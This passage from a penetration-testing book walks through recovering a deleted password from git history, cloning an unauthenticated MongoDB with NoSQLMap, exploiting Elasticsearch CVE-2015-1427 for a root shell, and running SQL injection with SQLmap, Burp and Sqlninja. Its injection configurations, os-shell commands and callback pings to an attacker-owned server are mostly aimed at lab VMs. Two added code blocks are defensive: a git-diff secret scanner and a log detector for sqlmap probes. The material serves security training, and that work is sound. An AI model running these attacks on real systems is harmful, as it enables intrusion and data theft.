[Screenshot: git status output listing deleted files, among them images/deselect-arrow.png, js/libs/respond.min.js and secret.php, ending with: no changes added to commit (use "git add" and/or "git commit -a")] 

Git - Deleted Files 





In the status output, we see that in the local revision, secret.php was deleted. To recover the deleted 
change, we can run a git diff command which will generate patch files or statistics of differences 
between paths or files in your git repository. To view the exact changes run the git diff 
command{11}: 

• git diff 


[Screenshot: git diff output for the deleted file (diff --git a/secret.php b/secret.php, deleted file mode 100644, --- a/secret.php, +++ /dev/null, @@ -1,102 +0,0 @@). After the removed HTML head (DOCTYPE, IE conditional comments, meta charset and viewport tags) comes the removed line: #Super secret password = "thekeystothekingdom"] 

Git - Recovering Passwords 


After running the diff command, we see that the Super secret password was removed. We can also 
recover the whole file by running a command to pull all files from the last commit: 
• git reset --hard 


These same types of techniques can be used to recover data from different types of repositories, but I 
wanted to point out the wealth of data that can be obtained from bad practices and misconfiguration. 
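Scanning history for committed credentials is the defensive counterpart of the pilfering above: a secret that was committed and later deleted is still in the diff. As an added example (not from the book), a Python parser for git diff / git log -p output that flags credential-looking literals on removed as well as added lines, run over a constructed diff shaped like the secret.php case; the SECRET_RE patterns and the sample hashes/keys are assumptions and placeholders.

```python
import re

# Per-file header of unified diff output produced by git.
FILE_HEADER_RE = re.compile(r"^diff --git a/(?P<a>\S+) b/(?P<b>\S+)$")

# Credential-looking assignments: password/secret/token/key followed by = or :
# and a quoted literal. Requiring the quotes avoids flagging references such as
# process.env.API_KEY. Tune the keyword list per code base (assumption).
SECRET_RE = re.compile(
    r"(?i)\b(?:pass(?:word|wd)?|secret|api[_-]?key|token|private[_-]?key)\b"
    r"\s*[=:]\s*(?P<value>[\"'][^\"']+[\"'])"
)


def parse_unified_diff(text):
    """Return one {'path', 'deleted', 'removed': [...], 'added': [...]} per file.

    Lines starting with '-'/'+' are only treated as content inside a hunk (after
    an '@@' header), so '--- a/file' and '+++ b/file' headers are never mistaken
    for removed/added lines that happen to begin with '--' or '++'.
    """
    files = []
    current = None
    in_hunk = False
    for line in text.splitlines():
        m = FILE_HEADER_RE.match(line)
        if m:
            current = {"path": m.group("b"), "deleted": False, "removed": [], "added": []}
            files.append(current)
            in_hunk = False
            continue
        if current is None:
            continue
        if line.startswith("@@"):
            in_hunk = True
            continue
        if not in_hunk:
            if line.startswith("deleted file mode"):
                current["deleted"] = True
            continue                       # index/---/+++ metadata
        if line.startswith("-"):
            current["removed"].append(line[1:])
        elif line.startswith("+"):
            current["added"].append(line[1:])
        # context lines (' ') and '\ No newline at end of file' are ignored
    return files


def find_secrets_in_diff(text):
    """Return (path, side, line) for every changed line that looks like a credential."""
    findings = []
    for f in parse_unified_diff(text):
        for side in ("removed", "added"):
            for line in f[side]:
                if SECRET_RE.search(line):
                    findings.append((f["path"], side, line.strip()))
    return findings


# Constructed diff in the shape of the page's example: secret.php deleted with
# its hard-coded password among the removed lines, plus a JS change that swaps
# a literal key for an environment lookup. Blob ids and keys are placeholders.
SAMPLE_DIFF = """\
diff --git a/secret.php b/secret.php
deleted file mode 100644
index 1234567..0000000
--- a/secret.php
+++ /dev/null
@@ -1,6 +0,0 @@
-<!DOCTYPE html>
-<head>
-  <meta charset="utf-8">
-</head>
-<?php
-  #Super secret password = "thekeystothekingdom"
diff --git a/js/app.js b/js/app.js
index 1111111..2222222 100644
--- a/js/app.js
+++ b/js/app.js
@@ -1,2 +1,2 @@
-var apiKey = "PLACEHOLDER-OLD-KEY";
+var apiKey = process.env.API_KEY;
"""

if __name__ == "__main__":
    for finding in find_secrets_in_diff(SAMPLE_DIFF):
        print(finding)
```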


NoSQLmap (www.nosqlmap.net/) (Kali Linux) 


I will discuss NoSQL further below in the web exploitation section, but with the increasing growth of 
NoSQL databases it is important to know how to interact with them. On numerous tests, scanners will 
find open Mongo/Couch databases with no passwords. I might not have time during the test to go 
through all the data in those databases, so this is where tools provide great value. If you want to 
replicate this specific attack, go into the NoSQL Database Injections section and set up the vulnerable 
Mongo database and associated web application. 


Starting NoSQLmap: 

• cd /opt/NoSQLMap 
• python nosqlmap.py 
• 1 - Set Options 
  o Set options for target host IP (your Mongo IP) 
  o Set local MongoDB/Shell IP (your IP) 
  o b - Save option file 
  o x - to Exit 
• 2 - NoSQL DB Access Attacks 


Once the attack starts, you should see the following: 

• DB Access attacks (MongoDB) 
• Checking to see if credentials are needed... 
• Successful access with no credentials! 
• MongoDB web management open at http://192.168.199.128:28017. authentication required! 
• Start tests for REST Interface (y/n)? y 
• REST interface not enabled. 

• 1 - Get Server Version and Platform 
• 2 - Enumerate Databases/Collections/Users 
• 3 - Check for GridFS 
• 4 - Clone a Database 
• 5 - Launch Metasploit Exploit for Mongo < 2.2.4 
• 6 - Return to Main Menu 
• Select an attack: 1 

• Server Info: 
• MongoDB Version: 2.0.6 
• Debugs enabled : False 
• Platform: 32 bit 

• Select an attack: 2 
• List of databases: 
• local 
• admin 
• users 
• appUserData 

• Select an attack: 4 
• Select a database to steal: 5 
• Does this database require credentials (y/n)? n 
• Database cloned. Copy another (y/n)? n 


So, what we effectively did was copy the victim's Mongo database to our local Mongo instance. We 
can now copy all the databases we have and look at them at a later time for sensitive information. 
How do we look at this data? In our example, we stole the database appUserData and cloned it. In 
our local copy of Mongo, we will see a new database populated called appUserData_stolen. To 
view it: 
• mongo 
• show dbs 
• use appUserData 
• show collections 
• db.users.find() 


[Screenshot: mongo shell - "use appUserData" switches to the cloned database, "show collections" lists system.indexes and users, and db.users.find() returns three documents with name/username pairs: james / james@suck.testlab, frank / frank@suck.testlab, paul / paul@suck.testlab] 

NoSQLMap - Cloning 





If you spend some time looking at the power of NoSQLMap, you will also see that there are some 
modules for exploitation. Within the tool, it also integrated a Metasploit exploit module for Mongo 
systems below version 2.2.4. 


Elastic Search (Kali Linux) 


I will say this throughout the book: One of the most important things in becoming a penetration tester 
is understanding a wide breadth of different technologies. Building a lab in your own environment 
with all the different types of servers will help identify what you might run into in the real world. I 
was on an engagement where the vulnerability scanners didn’t find any vulnerabilities for an Elastic 
Search (ES) database. By default, ES has a web application running on port 9200 used for its search 
API. It might have looked something like this: 


[Screenshot: Firefox on elastic.hacker.testlab:9200 showing the JSON response to a _search?q=*&pretty query: "took", "timed_out" : false, "_shards" (total 1, successful 1, failed 0) and hits from the ".marvel-2015.03.09" index of type "node_stats" with "cluster_name" : "elasticsearch"] 

Elastic Search - Vulnerable search service 


After finding something like this, I instantly knew that 9200 was the default port for Elastic Search, 
and, since I monitor security RSS feeds, I remembered that there was a recent vulnerability for it 
(CVE-2015-1427). Searching through exploit code, I was able to find one on Xiphos Research 
(https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch). I ran a quick wget on my 
Kali host, connected via the exploit and had a root shell. 





[Screenshot: the Xiphos Research ElasticSearch CVE-2015-1427 exploit (version 20150309) reporting "Shell on target... its only semi-interactive", with the resulting shell running as root and passwd-style output ending in var/www:/bin/sh] 

Elastic Search - Exploit 


Elastic Search Lab: 


If you want to build and test your own vulnerable Elastic Search service, you can install it with the 
following: 

• update-java-alternatives --jre -s java-1.7.0-openjdk-i386 
• wget https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch-1.4.1.zip 
• unzip elasticsearch-1.4.1.zip 
• cd elasticsearch-1.4.1/bin/ 
• ./plugin -i elasticsearch/marvel/latest 
• ./elasticsearch 


Once elasticsearch is running, you can download and execute your exploit code: 
• wget https://raw.githubusercontent.com/XiphosResearch/exploits/master/ElasticSearch/elas
• chmod +x ./elastic_shell.py 
• python ./elastic_shell.py localhost 


And with that, you have compromised another database and obtained access onto a ton of different 
hosts. 


Summary 


This is a baseline overview on taking the findings from the scanner results and putting them into 
action. These examples will help lead into how to exploit systems in the upcoming chapters. Attacks 
and exploits might not always work, which is why I stress that my readers avoid being tool- 
dependent. It is more important to understand why an attack works and what the underlying issue is, 
so that if a tool fails, you have the ability to modify and fix that exploit. 


What helped me learn how to exploit computers was to take exploits from sites like 
http://www.exploit-db.com/remote/ and recreate them in another high-level scripting language of my 
choice. Developing these types of scripts and testing them against your own servers will help you 
gain a much stronger background in coding and a better understanding for why vulnerabilities work. If 
you are looking to dive deeper into exploit development, I recommend reading The Shellcoder's 
Handbook: http://amzn.to/19Z1gfE. 


The Throw - Manual Web Application Findings 


At this point, you have assessed SUCK’s network, compromised the network scanner vulnerabilities, 
and now you need to move on to web attacks. As more and more companies start to run vulnerability 
scans of their own, I have slowly (slowly) been seeing a trend of the low-hanging service-based 
vulnerabilities going away (like MS08-067). Therefore, application-based vulnerabilities are still an 
easy target to exploit, since most vulnerability scanners either do not provide web application testing 
or do not enable it because it may break applications or take far too long to scan. 


As this book is geared more toward Red Teaming concepts, this book does not go in depth on all the 
different vulnerabilities and how to manually exploit them. This is because a manual web application 
book needs to be very detailed and discuss all the more obscure attacks like CORS (Cross-Origin 
Resource Sharing), SSRF (Server-Side Request Forgery), the various one-off OAuth issues that come 
with misconfiguration of security controls, and others. If you are looking for more information on 
testing all sorts of web type vulnerabilities, you should heavily use these three resources: 
• OWASP Testing Guide 
  o http://bit.ly/19GkG5R 
  o https://www.owasp.org/images/1/19/OTGv4.pdf 
• SANS - Securing Web Application Technologies 
  o https://www.sans.org/security-resources/posters/securing-web-application-technologies-swat-2014-60/download 
• The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 
  o http://amzn.to/11xZaCv 


Lastly, if you read about Printer Exploitation in The Drive section, that is a great example of how a 
web configuration vulnerability can get you to DA (or at least a domain account). 


Web Application Penetration Testing 


In the initial prep section, we have set up a couple of vulnerable VMs for testing. Since some of this 
section will be based off the OWASP Broken Web Application VM, I highly recommend you set it up 
prior to reading this chapter. You can download the VM here: 


• http://sourceforge.net/projects/owaspbwa/files/ 


Once you download it, you can unzip it and run it in either VMWare or VM Player. Once loaded, grab 
the IP of the virtual machine and open it up in your local browser. It should look something like the 
following: 

This is one of my favorite web application testing platforms. Definitely spend time learning how to 
break different web applications. 


SQL Injections 


From either the scanning results or from just poking around, you might be able to identify some SQL 
injections (SQLi) vulnerabilities. This is great because SQLi vulnerabilities can lead to a full 
compromise of the database or of the system itself. Two open source tools that I have found to work 
most of the time are SQLmap and Sqlninja. Let's go through the process from identification to 
exploitation. 


SQLMap with Burp 


SQLmap is one of my favorite tools to use for finding SQL injections, manipulating database queries, 
and dumping databases. It also has additional functionality to get an interactive shell through an 
injection and can even spawn Meterpreter or a VNC session back to the attacker. 


Before I show you how to use the command line versions of these tools, we will see how integration 
with Burp Proxy Pro also works extremely well. This has saved me from memorizing all of the 
different commands and allowed me to focus on being more efficient and effective. 


Install: 
• Jython 2.7beta3 
  o http://www.jython.org/downloads.html 
  o Download "Jython 2.7beta3 - Standalone Jar: For embedding Jython in Java applications" 
• Start Burp with: java -XX:MaxPermSize=1G -jar burpsuite_pro_v1.6.10.jar 
• Extender -> Options -> Python Environment -> Add the location and file of where you downloaded Jython 
• Restart Burp 
• Extender -> BApp Store 
• Select SQLiPy 
• (might as well install HTML5 Auditor, J2EEScan, CO2) 
• Restart Burp 





[Screenshot: Burp Extender > BApp Store with SQLiPy selected. The description reads: "This extension integrates Burp Suite with SQLMap." Requirements: Jython 2.7 beta (due to the use of json), Java 1.7 or 1.8, and a running instance of the SQLMap API server, started with python sqlmapapi.py -s -H <ip> -p <port>; once the API is running, right-click a request in the Target or Proxy tab, choose the SQLiPy entry to populate the SQLMap Scanner tab, and click "Start Scan". Author: Josh Berry @ CodeWatch, version 0.3.8] 

Burp - SQLiPy 


To use Burp and SQLMap, you start an SQLMap API on your Kali box; meanwhile, Burp Proxy Pro 
can be running anywhere. When Burp finds an SQL injection, it will connect to SQLMap’s running 
API to automatically attack the vulnerable parameters. Let’s now start the SQLMap API listener. 


Start SQLMap API: 
• cd /opt/sqlmap 
• python sqlmapapi.py -s -H [IP] -p [PORT] 

[Screenshot: terminal in /opt/sqlmap running python sqlmapapi.py -s -H 172.16.151.108 -p <port>] 

SQLMap API 


Burp and SQLMap LAB: 


To demonstrate how to use Burp and SQLMap, we can run a quick demo with the OWASPBWA VM we 
configured at the beginning. Once loaded, visit [ip]/webgoat.net/Content/SQLInjection.aspx and 
proxy through the Burp tool like we had done with our prior Burp example. 


[Screenshot: WebGoat.NET at http://172.16.151.144, Injection Attacks > Exploiting SQL Injection. The "Employee Email" lookup form ("Enter the first few letters of their first or last name", Find Employee) returns firstName / lastName / email rows such as Leslie Thompson lthompson@webgoatcoins.com, Foon Yue Tseng ftseng@webgoatcoins.com and Tom King tking@webgoatcoins.com] 

WebGoat Vulnerable Application 


Make a couple quick searches while proxy’ed through Burp Proxy Pro. In the HTTP history tab, you 
should see the POST request created by the application. Right-click on any request that we want to 
test and run SQLiPy Scan. 


[Screenshot: Burp Proxy > HTTP history with the POST /webgoat.net/Content/SQLInjection.aspx request to 172.16.151.144 selected; the right-click menu lists the usual actions (Do an active scan, Send to Intruder, Send to Repeater, Send to Comparer, Send to Decoder, ...) plus the extension entry "Send to SQLMapper"] 

Burp - SQLiPy Scan 


For the first time, we will have to input the SQLMap API IP and Port. We can also select what type 
of data we want to pull. 





[Screenshot: the SQLiPy SQLMap Scanner tab pre-filled from the request: SQLMap API IP 172.16.151.128, SQLMap API Port 8083, URL http://172.16.151.144:80/webgoat.net/Content/SQLInjection.aspx, the POST data, cookies, Referer and User-Agent, Level 3 / Risk 1, and checkboxes for Current User, Current DB, Hostname, List Users, List Passwords and List DBs] 

Burp - SQLMap Scanner Injection 


If an SQL Injection is successful, the Scanner tab will light up and have a new finding called 
"SQLMap Scan Finding." By clicking on this, we will be able to get information about the current 
DB, Hostname, Users, Passwords and databases. 


[Screenshot: the Burp Scanner Results tab with the "SQLMap Scan Finding" advisory open, listing the password hash retrieved for each database user (wackopicko, root, kbloom, stealth, sendmail, webcal, citizens, yazd10, sqlol)]

SQLMap Results 


As you can see above, we didn't need to remember any switches or parameters, but we were still 
able to dump the database. This makes SQL injections much quicker and leverages an easy-to-use 
GUI panel. 


Manual SQL Injection 


SQLmap (http://sqlmap.org/) (Kali Linux) 


The command line version has all the same functionality as through Burp. In the following examples, I 
will show both a GET parameter and a POST parameter example with SQLmap, since they are the 
most commonly identified types of SQLi. The reason I show both HTTP method attacks is that if 
you don't have the request properly configured, it is very likely the attack will fail. 


Here is a look at the help file for SQLmap. There are a lot of different switches that can be used for 
SQLi attacks: sqlmap -h. 





SQLMap Help Information 


GET Parameter Example 

In the following examples, we are going to assume that the GET parameter is where the SQLi 
vulnerability is located with the URL. We want to test every parameter and make sure that the SQLi 
vulnerability is really a finding. There are a good number of false positives I have seen with scanner 
tools, so validation is really the only method for ensuring the findings. Remember that if you do not 
specify a value to test, SQLmap will test every parameter by default. 


• Here is an example command to identify an SQL injection vulnerability using the 
banner switch: 

• cd /opt/sqlmap 

• python ./sqlmap.py -u "http://site.com/info.php?user=test&pass=test" -b 


For example, we will attack our vulnerable virtual machine (OWASPBWA): 
• python ./sqlmap.py -u "http://192.168.1.124/mutillidae/index.php?page=user-info.php&username=asdf&password=asdf&user-info-php-submit-button=View+Account+Details" -b 


[sqlmap output: the username parameter is reported as injectable with a MySQL UNION query (NULL) of 5 columns; web server operating system: Linux Ubuntu 10.04 (Lucid Lynx); web application technology: Apache 2.2.14; back-end DBMS operating system: Linux Ubuntu; shutting down at 18:28:41]





Retrieving the database username: 
• python ./sqlmap.py -u "http://site.com/info.php?user=test&pass=test" --current-user 

Interactive Shell: 
• python ./sqlmap.py -u "http://site.com/info.php?user=test&pass=test" --os-shell 

Some hints and tricks: 
• You might need to define which type of database to attack. If you think an injection 
is possible, but SQLmap is not finding the issue, try setting the --dbms=[database type] 
flag. 
• If you need to test an authenticated SQL injection finding, log into the website via a 
browser and grab the Cookie (you can grab it straight from Burp Suite). Then, define 
the cookie using the --cookie=[COOKIE] switch. 
• Stuck? Try the command: sqlmap --wizard. 


POST Parameter Example 

POST examples are going to mimic GET injections, except for how the vulnerable parameter is 
passed. Instead of being in the URL, the POST parameters are passed in the data section. This is 
normally seen with usernames and passwords, since web servers generally log GET parameters 
and you wouldn't want the web server to log passwords. Also, there are size limitations with GET 
methods and, therefore, a lot of data will be passed via POST parameters for larger applications. 


Determining if an SQL injection is valid (the result will be the banner if valid): 
• python ./sqlmap.py -u "http://site.com/info.php" --data="user=test&pass=test" -b 


For example, we will attack our vulnerable virtual machine (OWASPBWA): 
• python ./sqlmap.py -u "http://192.168.1.124/mutillidae/index.php?page=user-info.php&username=asdf&password=asdf&user-info-php-submit-button=View+Account+Details" -b 


[sqlmap output: the injection is reported as a UNION query with 5 columns; the back-end DBMS is MySQL; back-end DBMS operating system: Linux Ubuntu; the MySQL banner is retrieved; shutting down at 18:51:27. The command shown was run from /opt/sqlmap against mutillidae/index.php?page=login.php with the login form fields passed via --data]


SQLMap Banner 





Retrieving the database username: 

• python ./sqlmap.py -u "http://site.com/info.php" --data="user=test&pass=test" --current-user 


Interactive Shell: 

• python ./sqlmap.py -u "http://site.com/info.php" --data="user=test&pass=test" --os-shell 


If you are able to gain access to an os-shell, you will have full command line access as the database 
user. In the following example, I was able to find a vulnerable SQLi, gain an os-shell, and run an 
ipconfig command. 


[Screenshot: the sqlmap os-shell prompt running the command, followed by the prompt "do you want to retrieve the command standard output? [Y/n/a]"]





SQLMap Command Shell 


I recommend spending some time getting used to running different SQLi commands and trying 
different switches identified in the help file. If SQLmap fails, it might be your configuration, so make 
sure you try using the Wizard setup, also. 
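Seen from the other side of the wire, every sqlmap run above leaves a recognisable trail in the web server's access log. The following is an added example (not code from the book or from sqlmap): a small JavaScript check over constructed combined-format log lines that flags the UNION probe sqlmap reported against mutillidae and sqlmap's default User-Agent; the timestamps, client IP and byte counts are made up.

```javascript
'use strict';
// Added example (not from The Hacker Playbook or sqlmap): a defender-side check
// that flags the requests a sqlmap run like the ones above leaves in a combined
// format (Apache/nginx) access log. The log lines below are constructed.

// Combined log format:
// ip ident user [time] "METHOD path HTTP/x" status bytes "referer" "user-agent"
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"$/;

function parseLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], path: m[4], status: m[5], ua: m[7] };
}

// URL-decode the query string the way the application sees it ('+' is a space).
function decodeQuery(path) {
  const i = path.indexOf('?');
  const q = i === -1 ? '' : path.slice(i + 1);
  try {
    return decodeURIComponent(q.replace(/\+/g, ' '));
  } catch (e) {
    return q; // malformed percent-encoding: inspect the raw string instead
  }
}

// What sqlmap's standard payload families look like once decoded.
const SIGNALS = [
  { name: 'union-select',   re: /\bUNION\b(?:\s+ALL)?\s+SELECT\b/i },           // UNION / column-count probes
  { name: 'quote-boolean',  re: /'\s*(?:AND|OR)\s+\d+\s*=\s*\d+/i },             // boolean-based blind: ' AND 1=1
  { name: 'time-delay',     re: /\b(?:SLEEP|BENCHMARK)\s*\(|WAITFOR\s+DELAY/i }, // time-based blind
  { name: 'inline-comment', re: /--\s|#|\/\*/ },                                  // comment that swallows the rest of the query
];

function sqliSignals(decodedQuery) {
  return SIGNALS.filter(s => s.re.test(decodedQuery)).map(s => s.name);
}

// One finding per suspicious line: { ip, path, reasons }.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const rec = parseLine(line);
    if (!rec) continue;
    const reasons = sqliSignals(decodeQuery(rec.path));
    // sqlmap names itself in User-Agent unless --user-agent or --random-agent is used
    if (/sqlmap/i.test(rec.ua)) reasons.push('sqlmap-user-agent');
    if (reasons.length) findings.push({ ip: rec.ip, path: rec.path, reasons });
  }
  return findings;
}

// Constructed sample: a normal lookup of the mutillidae page from the example
// above, the UNION probe sqlmap reported, and a request carrying sqlmap's default UA.
const SAMPLE_LOG = [
  '192.168.1.50 - - [18/Mar/2015:18:27:01 -0500] "GET /mutillidae/index.php?page=user-info.php&username=asdf&password=asdf&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0"',
  '192.168.1.50 - - [18/Mar/2015:18:28:40 -0500] "GET /mutillidae/index.php?page=user-info.php&username=asdf%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%23&password=asdf&user-info-php-submit-button=View+Account+Details HTTP/1.1" 200 9870 "-" "Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0"',
  '192.168.1.50 - - [18/Mar/2015:18:28:41 -0500] "GET /mutillidae/index.php?page=user-info.php&username=asdf&password=asdf HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanAccessLog(SAMPLE_LOG)) {
    console.log(f.ip, f.reasons.join(','), f.path);
  }
}
```

The same signals work on a proxy or WAF log as long as the query string is decoded first; matching only the raw, percent-encoded line misses every payload sqlmap URL-encodes.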


Sqlninja 
(http://sqlninja.sourceforge.net/) (Kali Linux) 


Sqlninja is another great SQL injection tool for uploading shells and evading network IDS systems 
against MSSQL databases. You might be asking: Why would I use Sqlninja if I have already become 
comfortable with SQLmap? From many years of experience, I have seen a large number of tests that 
identify SQLi with only one tool or the other. This might be due to a number of factors such as how 
each tool detects blind SQLi, how it uploads binaries, how IPS signatures might detect one tool or the other, 
or how it handles cookies. There are so many different variables, and it would be smart to always 
double-check your work. 


Taking a look at the help file with the -h switch, we can see all the different functionality Sqlninja 
has: 





Sqlninja Help Page 


The only issue I have had with Sqlninja is that the configuration file is a bit more difficult to set up 
and I have never found great or easy-to-read documentation. So I will give two examples similar to 
those from SQLmap. 


In Sqlninja, you need to define the vulnerable variable to inject by using the __SQL2INJECT__ 
marker. This is different from SQLmap, where we did not need to specify which field to test 
against. Let's go through a couple of examples since it should make things much clearer. Before we 
can use Sqlninja, we need to define the Sqlninja configuration file. This will contain all the information 
about the URL, the type of HTTP method, session cookies, and browser agents. 


Let me show you the easiest way to obtain the information required for Sqlninja. As before, load up 
the Burp Suite and turn the proxy intercept on for the request where the vulnerable field is passed. In the 
following example, we are going to capture requests sent to /wfLogin.aspx and identify the POST 
parameter values. This is going to have most of the information required for Sqlninja injections, but 
slight modifications will need to be made to the Burp Raw request. 


Let's take a look at one of the requests from Burp that identified a potential SQLi vulnerability: 


[Screenshot: the Raw tab of the intercepted request in Burp]

POST /wfLogin.aspx HTTP/1.1 
Host: site.com 
User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-us,en;q=0.7,it;q=0.3 
Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 
Referer: [cut off in the scan] 
Cookie: ASP.NET_SessionId=3owsdevpwyrbjv45hltc4i45 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID=3dkDjb3jasfwefJGd 
Content-Length: 367 

Loginpanel1%3AtxtUserName=admin&Loginpanel1%3AtxtPassword=admin&Loginpanel1%3AbtnLogin=Login 


Burp Request Example 


In the next two examples, you will see how the most common GET and POST parameters are created. 
This can be used for any different type of HTTP method, but usually the POST and GET methods will 
be used. 


A few things to notice from the original Burp request versus how it will be entered in the Sqlninja 
configuration file are: 
• The HTTP method line (GET/POST) needs to be modified to include the full URL. Burp 
is missing the http://site.com in front of /wfLogin.aspx. 
• You have to define which parameters to fuzz by adding the __SQL2INJECT__ 
string. 
• Sometimes for Sqlninja, you may need to try the attack by first closing the 
vulnerable SQL parameter. This can be done with ticks, quotes, or semi-colons. 


GET Parameter Example 
We are going to write the sql_get.conf configuration file to our Kali desktop with two vulnerable 
parameters. Sqlninja will try to attack both the user and pass fields and try to validate if they are 
vulnerable. To create/modify the configuration file in a terminal, type: 
• gedit ~/Desktop/sql_get.conf 
• Enter the following into the configuration file and save it: 
--httprequest_start-- 
GET http://site.com/wfLogin.aspx?user=test';__SQL2INJECT__&pass=test';__SQL2INJECT__ HTTP/1.0 
Host: site.com 
User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */* 
Accept-Language: en-us, en; q=0.7, it;q=0.3 
Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID=3dkDjb3jasfwefJGd 
Connection: close 
--httprequest_end-- 


POST Parameter Example 
A POST request differs from a GET in that the parameters are passed in the data section instead of 
being part of the URL. In a terminal, we need to create the configuration file and modify the 
parameters to inject into. In this example, we will inject into both the username and password: 
• gedit ~/Desktop/sql_post.conf 
• Enter the following into the configuration file and save it: 
--httprequest_start-- 
POST http://site.com/wfLogin.aspx HTTP/1.0 
Host: site.com 
User-Agent: Mozilla/5.0 (X11; U; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8 
Accept: text/xml, application/xml, text/html; q=0.9, text/plain; q=0.8, image/png, */* 
Accept-Language: en-us, en; q=0.7, it;q=0.3 
Accept-Charset: ISO-8859-15, utf-8; q=0.7,*;q=0.7 
Content-Type: application/x-www-form-urlencoded 
Cookie: ASPSESSIONID=3dkDjb3jasfwefJGd 
Connection: close 
username=test';__SQL2INJECT__&password=test';__SQL2INJECT__ 
--httprequest_end-- 


Executing Sqlninja 
Whether you use a GET or POST method attack, executing your attack will be the same. Now that we 
have created a configuration file, we can use the following command to run Sqlninja: 

• sqlninja -mt -f ~/Desktop/sql_get.conf 


The preceding command runs Sqlninja in test mode to see if the injection works with the 
configuration file we just created. If you are lucky and do find a valid SQL injection, you can start to 
attack the database. In the following example, we are going to exploit our database, find the version, 
check to see if we are the "sa" account (which has administrative privileges), and see if we have 
access to a shell. 


[Screenshot: sqlninja -f sqlninja.conf -m f (fingerprint mode), Sqlninja rel. 0.2.6-r1. After parsing sqlninja.conf, the discovery menu offers: database version (2000/2005/2008), database user, database user rights, whether xp_cmdshell is working, whether mixed or Windows-only authentication, whether SQL Server runs as System (xp_cmdshell must be available), current database name, all of the above, print this menu, and exit. Option 0 reports Target: Microsoft SQL Server 2000; option 1 reports that we seem to be 'sa'; the current DB name check returns a length of 0; option 3 reports that xp_cmdshell seems to be available]





Sqlninja Example 


Once we have xp_cmdshell available, we want to test that we have command line access and what 
types of privileges we have. In the example below we are exploiting the SQLi vulnerability and 
testing command line commands. 


During this specific test (image below), it looks like we might be running commands on the server, 
but we would need to validate this. The issue, though, is that after setting up a listener on a server we 
own on the Internet, it doesn't look like we are seeing any connections from the compromised server 
outbound. This could be a problem if we wanted to exfiltrate data back to us or download additional 
malware. Since the command line console created by Sqlninja doesn't show the responses from 
commands, we need to validate that our commands are successfully executing. 


The best way to check if a command is working is by putting tcpdump to listen for pings on a server 
we own, which is publicly available on the Internet. By running ping commands on a compromised 
server, we can easily validate if our server is responding to pings. The reason we use pings is 
because ICMP is generally allowed outbound and is less likely to trigger IDS/IPS signatures. This 
can be configured with the following command on an external server owned by the attacker: 

• tcpdump -nnvXSs 0 -c2 icmp 


This command will log any pings sent to my server, which will allow me to validate that the server 
can talk outbound and that my commands are working. On my compromised SQLi host, I execute a 
simple ping back to my server. If it is successful, tcpdump will see the ICMP request. 


Command line SQLi attacks can be run with the following command: 
• sqlninja -f [configuration file] -mc 


As we can see in the image below, I first tried to run telnet commands back to my server, but that was 
unsuccessful. I then tried to initiate ping commands back to my server, where tcpdump was listening. 
In this case, my attack was successful, which proved I could run full commands on this host, but it 
does not have web access back out. 


In the image below, the top portion is my server logging pings and the bottom image is the victim host, 
which is vulnerable to SQLi. Although the telnet commands seem to fail, the pings are successful. 


[Screenshot, top: sudo tcpdump -nnvXSs 0 -c2 icmp on the attacker's server captures one ICMP echo request and its echo reply (2 packets captured, 0 dropped by kernel). Bottom: sqlninja blind command mode after parsing sql.conf and loading lib/getdata_time.pl on port 80; "telnet internet-scan.com 999" and "ping internet-scan.com" are each reported as "Command has been sent and executed", but only the ping shows up in tcpdump]


SQLMap Command Injection Ping 





If you have gotten this far and you aren't sure what to do next, you can jump to the Lateral Pass 
section to get an idea on next steps. This should give you enough details to help you start testing and 
practicing on vulnerable frameworks. Of course, these are the best scenario options, where the SQLi 
works without having to configure detailed settings about the database type, blind SQLi type, or other 
timing type issues. 


NoSQL Database Injections 


More and more, I am coming across NoSQL type databases on my penetration tests. If you aren't 
familiar with NoSQL, try to build out a database and interact with it. The major difference between 
the two types of databases is that a regular SQL database is structured and relational, while a 
NoSQL database is based more on key/value pairs, allowing you to store any type of data. This is 
a very high-level explanation and it takes a little time to understand why NoSQL databases are more 
beneficial compared to traditional relational databases. 


The two common types of NoSQL databases I come across are CouchDB and MongoDB. There has 
always been a consensus that SQL injections do not work on NoSQL databases. This isn't completely 
true. While many of the normal SQL injection attacks do not work in their current form, it is still 
possible to accomplish many of the same goals. This is best demonstrated through the following 
example. In the next lab example, we will build a MongoDB server and vulnerable application. 


LAB: 
• git clone https://github.com/tcstool/NoSQLMap.git /opt/NoSQLMap 
• git clone https://github.com/cheetz/NoSQL_Test.git /opt/NoSQL_Test 
• apt-get install php5-dev php-pear 
• pear install -f pecl/mongo 
• pecl install mongo 
• pecl install apc 
• gedit /etc/php5/apache2/php.ini 
◦ add the following to the php.ini file: 
◦ extension=mongo.so 
• service apache2 start 
• gedit /etc/mongodb.conf 
◦ Edit the bind address so MongoDB listens on any interface: 
◦ bind_ip = 0.0.0.0 
• mkdir /var/www/vuln_apps 
• mv /opt/NoSQL_Test/userdata.php /var/www/vuln_apps 
• service apache2 restart && service mongodb restart 


